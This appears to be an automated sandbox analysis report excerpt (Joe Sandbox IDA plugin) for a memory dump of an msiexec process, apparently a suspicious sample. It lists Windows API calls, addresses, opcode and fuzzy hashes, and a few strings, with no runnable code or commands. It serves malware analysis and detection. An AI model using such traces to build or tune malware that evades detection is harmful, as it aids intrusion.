                                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                            • String ID:
                                                                                            • API String ID: 3397143404-0
                                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1125800050-0
                                                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                            • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleSleep
                                                                                            • String ID: }A
                                                                                            • API String ID: 252777609-2138825249
                                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                            APIs
                                                                                            • malloc.MSVCRT ref: 00409A10
                                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                            • free.MSVCRT ref: 00409A31
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: freemallocmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 3056473165-0
                                                                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d
                                                                                            • API String ID: 0-2564639436
                                                                                            • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                            • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: BINARY
                                                                                            • API String ID: 2221118986-907554435
                                                                                            • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                            • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID: /stext
                                                                                            • API String ID: 2081463915-3817206916
                                                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                            • String ID:
                                                                                            • API String ID: 2445788494-0
                                                                                            • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                            • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3150196962-0
                                                                                            • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                            • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                            APIs
                                                                                            Strings
                                                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc
                                                                                            • String ID: failed to allocate %u bytes of memory
                                                                                            • API String ID: 2803490479-1168259600
                                                                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041BDDF
                                                                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmpmemset
                                                                                            • String ID:
                                                                                            • API String ID: 1065087418-0
                                                                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                            APIs
                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                            • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1381354015-0
                                                                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004301AD
                                                                                            • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID:
                                                                                            • API String ID: 1297977491-0
                                                                                            • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                            • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                            • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                            • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                            APIs
                                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                            • String ID:
                                                                                            • API String ID: 2154303073-0
                                                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                            APIs
                                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3150196962-0
                                                                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                            APIs
                                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$PointerRead
                                                                                            • String ID:
                                                                                            • API String ID: 3154509469-0
                                                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                            APIs
                                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4232544981-0
                                                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                            APIs
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$FileModuleName
                                                                                            • String ID:
                                                                                            • API String ID: 3859505661-0
                                                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                            APIs
